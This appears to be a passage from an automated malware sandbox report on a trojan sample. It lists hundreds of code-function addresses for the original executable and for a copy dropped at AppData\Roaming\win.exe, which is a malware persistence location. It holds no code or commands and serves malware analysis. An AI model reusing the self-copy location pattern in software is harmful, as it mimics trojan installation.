            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B8E4B
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B0E4D
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B3244
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B6253
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B1265
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B7E78
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4A73
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B3275
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B0A88
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B8E8C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B0E80
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4A87
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exeCode function: 0_2_020B4E99
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B4694
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B4AA0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B62A4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B0EB3
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B12DC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B46D3
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B8ED0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B1ED7
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B630B
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B2B01
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B4300
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B4B00
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B1313
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B4F14
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B0F2F
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B4B2D
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B4B25
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B2F3E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B1F3C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B2B37
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B4B5C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B1F52
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B2F50
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B136B
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B3B6F
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B6363
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B3B60
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B1F7F
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B4F8C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B2B83
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B0F9B
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B4797
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B2FA8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B3BAF
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B63AC
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B4FB8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B8BBE
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B4BB0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B2BD8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B0FEB
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B47F4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B3C0C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B641B
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B4C16
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B0C25
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B3C3F
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B2C33
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B104C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B4847
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B8C44
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B0C5B
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B4C68
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B8C6D
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B3063
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B247D
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B6480
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B4899
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B2C94
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B1094
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B0CA6
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B10CB
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B44CF
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B0CC1
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B44C0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B30C4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B64DB
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B8CDA
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B2CD9
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B5CD9
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B98D8
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B48E3
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B4CE4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B5CE4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B60FA
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B28FE
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B0CF3
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B98F3
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B3114
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B8D14
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B4D2A
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B5D21
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B1120
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B4520
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B093E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B2D30
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B4948
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B8547
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B095B
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B8D5C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B9951
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B116C
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B317B
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B8D7E
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B5D71
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B4570
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B2D88
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B4D83
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B4985
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B0D91
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B41A7
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B45B5
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B8DC3
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B4DE9
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B0DEF
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B45E0
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B45E4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B45F9
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B8DFF
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B09FD
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B31F4
            Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.46442270.25635.exe Code function: 0_2_020B49F4
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B623F
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B0816
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B0CBA
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B5CB3
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B98CB
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B1D2E
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B1204
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B4A27
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B4638
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B3E30
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B0A37
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B4E36
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B8E4B
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B0E4D
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B3244
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B6253
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B1265
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B7E78
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B4A73
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B3275
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B0A88
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B8E8C
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B0E80
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B4A87
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B4E99
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B4694
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B4AA0
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B62A4
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B0EB3
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B12DC
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B46D3
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B8ED0
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B1ED7
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B630B
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B2B01
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B4300
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B4B00
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B1313
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B4F14
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B0F2F
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B4B2D
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B4B25
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B2F3E
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B1F3C
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B2B37
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B4B5C
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B1F52
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B2F50
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B136B
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B3B6F
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B6363
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B3B60
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B1F7F
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B4F8C
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B2B83
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B0F9B
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B4797
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B2FA8
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B3BAF
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B63AC
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B4FB8
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B8BBE
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B4BB0
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B2BD8
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B0FEB
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B47F4
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B3C0C
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B641B
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B4C16
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B0C25
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B3C3F
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B2C33
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B104C
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B4847
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B8C44
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B0C5B
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B4C68
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B8C6D
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B3063
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B247D
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B6480
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B4899
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B2C94
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B1094
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B0CA6
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B10CB
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B44CF
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B0CC1
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B44C0
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B30C4
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B64DB
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B8CDA
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B2CD9
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B5CD9
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B98D8
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B48E3
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B4CE4
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B5CE4
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B60FA
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B28FE
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B0CF3
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B98F3
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B3114
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B8D14
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B4D2A
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B5D21
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B1120
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B4520
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B093E
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B2D30
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B4948
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B8547
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B095B
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B8D5C
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B9951
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B116C
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B317B
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B8D7E
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B5D71
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B4570
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B2D88
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B4D83
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B4985
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B0D91
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B41A7
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B45B5
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B8DC3
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B4DE9
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B0DEF
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B45E0
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B45E4
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B45F9
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B8DFF
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B09FD
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B31F4
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 16_2_020B49F4
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A0816
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A98CB
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A0CBA
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A5CB3
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A1D2E
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A623F
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A247D
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A4C68
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A8C6D
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A3063
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A0C5B
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A104C
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A4847
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A8C44
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A3C3F
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A2C33
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A0C25
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A641B
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A4C16
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A3C0C
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A60FA
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A28FE
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A0CF3
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A98F3
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A48E3
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A4CE4
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A5CE4
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A8CDA
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A64DB
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A98D8
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A2CD9
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A5CD9
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A10CB
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A44CF
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A44C0
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A0CC1
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A30C4
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A0CA6
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A4899
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A2C94
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A1094
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A6480
            Source: C:\Users\user\AppData\Roaming\win.exe Code function: 17_2_007A317B
